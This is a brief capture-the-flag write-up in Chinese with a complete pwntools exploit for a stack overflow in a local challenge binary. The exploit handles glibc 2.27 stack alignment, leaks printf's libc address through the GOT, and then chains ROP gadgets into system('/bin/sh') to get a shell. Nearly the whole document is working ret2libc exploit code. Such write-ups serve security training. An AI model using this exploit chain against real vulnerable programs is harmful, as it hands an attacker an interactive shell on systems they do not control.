显然就是一个简单的栈溢出,但是问题是还是不知道libc。
试了半天libc是2.27的,但是2.27的libc又会有一个栈对齐的问题。
调试调试给它对齐就行。
有好几处需要栈对齐。
exp
from pwn import*
# Two-stage ret2libc for the local "yb1" challenge binary.
#   Stage 1: overflow the name buffer, call printf(printf@got) to leak the
#            resolved libc address of printf, then return to main.
#   Stage 2: overflow again and call system("/bin/sh") with the rebased libc.
# Lone `ret` gadgets are inserted before each libc call to keep the stack
# 16-byte aligned (the glibc 2.27 alignment issue described above).
# (Written for Python 2 pwntools: p64() and recv data are plain str here.)
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']

io = process("yb1")
binary = ELF("./yb1")
libc = ELF("./64/libc-2.27.so")

# Hard-coded addresses from the challenge binary (presumably non-PIE, since
# they are used as absolute addresses).
POP_RDI = 0x400703   # pop rdi ; ret  -- sets the single argument for printf/system
RET = 0x400690       # bare ret       -- stack-alignment padding
MAIN = 0x4005f7      # re-enter main for the second overflow
PRINTF_PLT = binary.plt['printf']
PRINTF_GOT = binary.got['printf']

PROMPT = "What's your name? "
PADDING = "a" * 40   # distance from the buffer to the saved return address (per the original)

def rop(*addrs):
    """Concatenate the given addresses as little-endian 8-byte words."""
    return "".join(p64(a) for a in addrs)

# Stage 1: leak printf's libc address via the GOT, then loop back to main.
io.sendlineafter(PROMPT, PADDING + rop(RET, POP_RDI, PRINTF_GOT, PRINTF_PLT, RET, MAIN))

# printf echoes the raw GOT entry; the user-space address ends in 0x7f, so
# take the 6 bytes up to and including it and zero-extend to 8 bytes.
leaked = io.recvuntil("\x7f")[-6:]
printf_addr = u64(leaked + '\x00\x00')
libc_base = printf_addr - libc.sym['printf']

system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search("/bin/sh"))

# Stage 2: system("/bin/sh"). A stack canary, PIE or full RELRO would each
# break one step of this chain, which is why they are the standard mitigations.
io.sendlineafter(PROMPT, PADDING + rop(RET, POP_RDI, bin_sh, system_addr))
io.interactive()